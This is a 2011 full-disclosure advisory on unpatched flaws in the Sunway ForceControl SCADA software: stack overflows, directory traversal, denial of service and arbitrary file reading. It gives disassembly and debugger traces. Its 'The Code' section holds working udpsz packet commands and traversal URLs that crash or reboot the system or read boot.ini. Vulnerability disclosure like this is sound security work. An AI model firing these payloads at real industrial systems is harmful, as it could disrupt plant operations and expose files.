[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Vulnerabilities in Sunway ForceControl 6.1 sp3 (SCADA)



#######################################################################

                             Luigi Auriemma

Application:  Sunway ForceControl
              http://www.sunwayland.com.cn/pro.asp
Versions:     <= 6.1 sp3 with AngelServer and WebServer updated
Platforms:    Windows
Bugs:         various stack overflows
              directory traversals
              third party ActiveX code execution
              various Denials of Service
Exploitation: remote
Date:         22 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@xxxxxxxxxxxxx
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


ForceControl is a chinese SCADA/HMI software.


#######################################################################

=======
2) Bugs
=======

-----------------------------
A] AngelServer stack overflow
-----------------------------

Signed comparison in packet 8 of AngelServer that leads to a stack
overflow:

  004022E1   > B9 19000000       MOV ECX,19
  004022E6   . 33C0              XOR EAX,EAX
  004022E8   . 8D7C24 24         LEA EDI,DWORD PTR SS:[ESP+24]
  004022EC   . 83FE 64           CMP ESI,64                     ; our value
  004022EF   . F3:AB             REP STOS DWORD PTR ES:[EDI]
  004022F1   . 0F8D E7000000     JGE AngelSer.004023DE          ; signed
  004022F7   . 8BCE              MOV ECX,ESI
  004022F9   . 8D75 0C           LEA ESI,DWORD PTR SS:[EBP+C]
  004022FC   . 8BD1              MOV EDX,ECX
  004022FE   . 8D7C24 24         LEA EDI,DWORD PTR SS:[ESP+24]
  00402302   . C1E9 02           SHR ECX,2                      ; memcpy
  00402305   . F3:A5             REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  00402307   . 8BCA              MOV ECX,EDX
  00402309   . 8D4424 24         LEA EAX,DWORD PTR SS:[ESP+24]
  0040230D   . 83E1 03           AND ECX,3
  00402310   . 50                PUSH EAX
  00402311   . F3:A4             REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
  00402313   . 8B8C24 A0000000   MOV ECX,DWORD PTR SS:[ESP+A0]
  0040231A   . E8 A1FDFFFF       CALL AngelSer.004020C0
  0040231F   . E9 BA000000       JMP AngelSer.004023DE


--------------------------------
B] WebServer directory traversal
--------------------------------

Through the usage of a 3-dots pattern it's possible to download the
files located in the disk of the project used by WebServer.


--------------------------------------------
C] various Denials of Service in AngelServer
--------------------------------------------

The AngelServer program is affected by various problems that lead to
Denial of Service effects:

- exception handler due to unallocable memory through packet 6
- invalid memory read access during memcpy through packet 6
- whole system reboot through packet 6
- endless loop during the handling of the interfaces through packet 6
- whole system reboot through packet 7


-------------------------------------
D] third party ActiveX code execution
-------------------------------------

This software is bundled with the "Cell Software"'s YRWXls.ocx ActiveX
component (BD9E5104-2F20-4A9F-AB14-82D558FF374E version 5.3.7.321 which
is the latest) and it's affected by a vulnerability in the Login method:

  eax=886641aa ebx=02c55aac ecx=015ebd5c edx=886641ab esi=886641aa edi=015ebd88
  eip=02c01db2 esp=015ebd10 ebp=02c867c0 iopl=0         nv up ei ng nz na pe nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
  YRWXls!DllRegisterServer+0x2ab62:
  02c01db2 8a08            mov     cl,byte ptr [eax]          
ds:0023:886641aa=??
  0:008> gn
  (a1c.e00): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00000000 ebx=00000000 ecx=6ed9b6fc edx=7c8285f6 esi=00000000 edi=00000000
  eip=6ed9b6fc esp=015eb948 ebp=015eb968 iopl=0         nv up ei pl zr na pe nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
  6ed9b6fc ??              ???

No additional research has been performed on the vulnerability, anyway
in my test it's necessary to load any other unsafe ActiveX component
first (tested on Windows 2003).


-------------------------------------
E] stack overflow in SNMP NetDBServer
-------------------------------------

Stack overflow caused by the copying of data chunks in a stack buffer:

  0040303A  |. 66:8B40 0A     MOV AX,WORD PTR DS:[EAX+A]        ; chunks
  0040303E  |. 0FBFC0         MOVSX EAX,AX
  00403041  |. 3BC7           CMP EAX,EDI
  00403043  |. 0F8E AC000000  JLE SNMP_Net.004030F5
  00403049  |. 894424 14      MOV DWORD PTR SS:[ESP+14],EAX
  0040304D  |> B9 10000000    /MOV ECX,10
  00403052  |. 33C0           |XOR EAX,EAX
  00403054  |. 8D7C24 2C      |LEA EDI,DWORD PTR SS:[ESP+2C]
  00403058  |. 83C3 02        |ADD EBX,2
  0040305B  |. F3:AB          |REP STOS DWORD PTR ES:[EDI]
  0040305D  |. 8B46 2C        |MOV EAX,DWORD PTR DS:[ESI+2C]
  00403060  |. 43             |INC EBX
  00403061  |. 8D7C24 2C      |LEA EDI,DWORD PTR SS:[ESP+2C]
  00403065  |. 66:8B6C18 FD   |MOV BP,WORD PTR DS:[EAX+EBX-3]   ; chunk num
  0040306A  |. 8A4C18 FF      |MOV CL,BYTE PTR DS:[EAX+EBX-1]   ; chunk size
  0040306E  |. 884C24 20      |MOV BYTE PTR SS:[ESP+20],CL
  00403072  |. 8D3418         |LEA ESI,DWORD PTR DS:[EAX+EBX]
  00403075  |. 8B5424 20      |MOV EDX,DWORD PTR SS:[ESP+20]
  00403079  |. 81E2 FF000000  |AND EDX,0FF
  0040307F  |. 8BCA           |MOV ECX,EDX
  00403081  |. 03DA           |ADD EBX,EDX                      ; concatenate
  00403083  |. 8BC1           |MOV EAX,ECX
  00403085  |. C1E9 02        |SHR ECX,2                        ; memcpy
  00403088  |. F3:A5          |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  0040308A  |. 8BC8           |MOV ECX,EAX
  0040308C  |. 83E1 03        |AND ECX,3
  0040308F  |. F3:A4          |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]


---------------------------------------------
F] integer stack overflow in SNMP NetDBServer
---------------------------------------------

Signed 8 bit value expanded due to its sign and used in a memcpy over a
stack buffer, note that also in this case the chunked data is
concatenable so there is also this other way to exploit the overflow:

  00402B78  |. 0FBE2C1A       |MOVSX EBP,BYTE PTR DS:[EDX+EBX]  ; 8bit expansion
  00402B7C  |. F3:AB          |REP STOS DWORD PTR ES:[EDI]
  00402B7E  |. 8BCD           |MOV ECX,EBP
  00402B80  |. 43             |INC EBX
  00402B81  |. 8BC1           |MOV EAX,ECX
  00402B83  |. 8D7C24 20      |LEA EDI,DWORD PTR SS:[ESP+20]
  00402B87  |. 8D341A         |LEA ESI,DWORD PTR DS:[EDX+EBX]
  00402B8A  |. 03DD           |ADD EBX,EBP                      ; concatenate
  00402B8C  |. C1E9 02        |SHR ECX,2                        ; memcpy
  00402B8F  |. F3:A5          |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  00402B91  |. 8BC8           |MOV ECX,EAX
  00402B93  |. 33C0           |XOR EAX,EAX
  00402B95  |. 83E1 03        |AND ECX,3
  00402B98  |. 43             |INC EBX
  00402B99  |. F3:A4          |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
  ...and...
  00402B9B  |. 0FBE6C1A FF    |MOVSX EBP,BYTE PTR DS:[EDX+EBX-1]
  00402BA0  |. B9 10000000    |MOV ECX,10
  00402BA5  |. 8D7C24 40      |LEA EDI,DWORD PTR SS:[ESP+40]
  00402BA9  |. F3:AB          |REP STOS DWORD PTR ES:[EDI]
  00402BAB  |. 8BCD           |MOV ECX,EBP
  00402BAD  |. 8D341A         |LEA ESI,DWORD PTR DS:[EDX+EBX]
  00402BB0  |. 8BD1           |MOV EDX,ECX
  00402BB2  |. 8D7C24 40      |LEA EDI,DWORD PTR SS:[ESP+40]
  00402BB6  |. C1E9 02        |SHR ECX,2
  00402BB9  |. F3:A5          |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  00402BBB  |. 8BCA           |MOV ECX,EDX
  00402BBD  |. 8D4424 40      |LEA EAX,DWORD PTR SS:[ESP+40]
  00402BC1  |. 83E1 03        |AND ECX,3
  00402BC4  |. 50             |PUSH EAX
  00402BC5  |. F3:A4          |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]


----------------------------------------
G] Denial of Service in SNMP NetDBServer
----------------------------------------

  00402A0A  |> 8B4B 30        MOV ECX,DWORD PTR DS:[EBX+30]
  00402A0D  |. 83F9 0B        CMP ECX,0B
  00402A10  |. 7C 24          JL SHORT SNMP_Net.00402A36
  00402A12  |. 8B5B 2C        MOV EBX,DWORD PTR DS:[EBX+2C]
  00402A15  |. 8B43 06        MOV EAX,DWORD PTR DS:[EBX+6]
  00402A18  |. 3BC8           CMP ECX,EAX
  00402A1A  |. 7C 1A          JL SHORT SNMP_Net.00402A36    ; signed comparison
  00402A1C  |. 8D5403 FE      LEA EDX,DWORD PTR DS:[EBX+EAX-2]
  00402A20  |. B9 A0704000    MOV ECX,SNMP_Net.004070A
  00402A25  |. 5F             POP EDI
  00402A26  |. 5E             POP ESI
  00402A27  |. 66:8B02        MOV AX,WORD PTR DS:[EDX]      ; invalid access


---------------------------------------
H] Arbitrary files reading in NetServer
---------------------------------------

Through this server it's possible to read any file on any disk or
share.
Opcodes 0x00 and 0x04 are used to open the file (the first one only
adds the full project path to the name, so use directory traversal
with it) while 0x02 is used to read and send its content with the
possibility of specifying also the offset.

Note that there is also a very limited heap overflow caused by some
calculations performed on the offset where is possible to allocate a 0
bytes buffer for the reply packet but with only a Denial of Service
effect.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip (version 0.3.3)

A]
  udpsz -T -C "08000000 00000000 ffffffff" -b a SERVER 8800 0x400

B]
  http://SERVER/.../.../.../boot.ini

C]
  udpsz -T -C "06000000 00000000 ffffffff" -b a SERVER 8800 0x400
  udpsz -T -C "06000000 00000000 ffffff00" -b a SERVER 8800 0x400
  udpsz -T -C "06000000 00000000 00040000" -b a SERVER 8800 0x400
  udpsz -T -C "06000000 00000000 00040000" -c "2147483647," -b a SERVER 8800 
0x400
  udpsz -T -C "07000000 00000000 00000000" SERVER 8800 0x400

D]
  http://aluigi.org/poc/yrwxls_1.zip

E]
  udpsz -C "eb50eb50 5300 ffff0000 0100 ffff ff" 0 -C "0d0a" -1 -b a -T SERVER 
2001 0xffff

F]
  udpsz -C "eb50eb50 5700 ffff0000 0100 ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 
0xffff

G]
  udpsz -C "eb50eb50 0000 80808080" -T SERVER 2001 0xb

H]
  udpsz -D -1 -C "8888888888888888 00010000 01000000 04000000 
633a5c626f6f742e696e69" 0 -C "8888888888888888 1c000000 01000000 02000000 
00000000 ffffff7f" -1 -T SERVER 2006 0x11c


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org